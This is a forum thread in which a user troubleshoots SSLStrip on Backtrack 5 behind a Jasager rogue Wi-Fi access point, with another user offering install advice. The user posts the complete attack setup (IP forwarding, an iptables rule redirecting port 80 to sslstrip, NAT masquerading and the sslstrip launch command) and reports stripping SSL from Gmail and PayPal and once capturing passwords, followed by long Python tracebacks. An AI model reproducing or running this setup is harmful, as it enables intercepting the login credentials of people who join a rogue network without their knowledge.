Sslstrip & Backtrack 5

bobbyb1980

Hello all. I was having some problems with SSL Strip 0.8 and Backtrack 5. What I am trying to do is use Jasager on an Open Mesh router configured with ICS and use SSL Strip from there. I am currently using the jasagerPwn script to do this, and the actual internet connection sharing works perfectly.

What does not work so well is SSL Strip. As soon as I start SSL Strip the connection lags for a minute or so, then completely dies. Sometimes I am able to get it working for a few minutes, but it almost eventually always dies. This is the error I always receive upon start/termination of the connection:

logging.warning("Host resolution error: " + error) exceptions/TypeError: cannot conatenate 'str' and 'instance' objects

I noticed that on the latest version of Backtrack 5 SSLStrip 0.8 is installed so I tried to install 0.9. I used apt-get remove sslstrip and ti told me it successfully removed, but it did not. When I downloaded sslstrip 0.9 and tried to run the install.ph script, it tells me "Permission Denied" despite the fact that I am root. I cannot get the install script to run in BT5 no matter how many times I su the session.

Considering I switched to BT5 from Ubuntu I'd like to avoid switching OS's and find a solution to the problem. I've found a few topics about this issue across the internet but none seem to offer a solution.

Anyone have any ideas?

To run that script you must make it executable, chmod +x filename and then ./filename.

What commands do you use to run sslstrip? And. Are you running it on bt5 or jasager router?

If on bt5 what commands do you use?

Edited by Jarmo

I stopped using the jasagerPwn script and manually configured ICS which seems to have a little more stability. Here are the settings used to configure ICS (ICS works fine).

uci set network.lan.ipaddr=172.20.0.2
uci set network.lan.gateway=172.20.0.1
uci set network.lan.dns=192.168.1.254
uci commit network

Here are the routing settings and what I use to run SSLStrip (SSLStrip is run from the attacker machine and not router)

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward > /dev/null
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123
sudo iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
sudo ifconfig eth0 172.20.0.1 netmask 255.255.255.0
sudo dhclient wlan0
sslstrip -l 64123 -f sslstrip-0.8/lock.ico

Now I can share internet fine and I can go to websites like gmail.com or paypal.com and there will be no SSL. I have succeeded one time in getting passwords to print to the ssl logfile but I get the following error. Sometimes it still continues logging after the error, sometimes no. I just got it working in the past few hours so I need to test it further. I should also note that as previously mentioned I tried to uninstall sslstrip-0.8 (don't know whether it suceeded) and install sslstrip-0.9 (after chmodding the script I was able to run the install script, but it did not do anything, just a blinking cursor). However, I can run sslstrip-0.9 without installing it seemingly fine (however I do get the following error)

sslstrip -l 64123 -f 

sslstrip 0.8 by Moxie Marlinspike running...
Traceback (most recent call last):
  File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 84, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 69, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 59, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 37, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
  File "/usr/lib/python2.6/dist-packages/twisted/internet/selectreactor.py", line 146, in _doReadOrWrite
    why = getattr(selectable, method)()
  File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 460, in doRead
    return self.protocol.dataReceived(data)
  File "/usr/lib/python2.6/dist-packages/twisted/protocols/basic.py", line 259, in dataReceived
    return self.rawDataReceived(data)
  File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 537, in rawDataReceived
    self.handleResponseEnd()
  File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 110, in handleResponseEnd
    HTTPClient.handleResponseEnd(self)
  File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 500, in handleResponseEnd
    self.handleResponse(B)
  File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 121, in handleResponse
    self.shutdown()
  File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 141, in shutdown
    self.client.finish()
  File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 900, in finish
    "Request.finish called on a request after its connection was lost; "
exceptions.RuntimeError: Request.finish called on a request after its connection was lost; use Request.notifyFinish to keep track of this.
^CTraceback (most recent call last):
  File "/usr/lib/python2.6/dist-packages/twisted/internet/defer.py", line 213, in addCallbacks
    self._runCallbacks()
  File "/usr/lib/python2.6/dist-packages/twisted/internet/defer.py", line 371, in _runCallbacks
    self.result = callback(self.result, *args, **kw)
  File "/usr/lib/python2.6/dist-packages/twisted/internet/base.py", line 409, in _continueFiring
    callable(*args, **kwargs)
  File "/usr/lib/python2.6/dist-packages/twisted/internet/base.py", line 595, in disconnectAll
    failure.Failure(main.CONNECTION_LOST))
--- <exception caught here> ---
  File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 84, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 69, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 59, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 37, in callWithContext
    return func(*args,**kw)
  File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 677, in connectionLost
    Connection.connectionLost(self, reason)
  File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 519, in connectionLost
    protocol.connectionLost(reason)
  File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 489, in connectionLost
    self.handleResponseEnd()
  File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 110, in handleResponseEnd
    HTTPClient.handleResponseEnd(self)
  File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 500, in handleResponseEnd
    self.handleResponse(B)
  File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 121, in handleResponse
    self.shutdown()
  File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 141, in shutdown
    self.client.finish()
  File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 900, in finish
    "Request.finish called on a request after its connection was lost; "
exceptions.RuntimeError: Request.finish called on a request after its connection was lost; use Request.notifyFinish to keep track of this.

Any ideas would be greatly appreciated.

Edited by bobbyb1980

• 4 months later...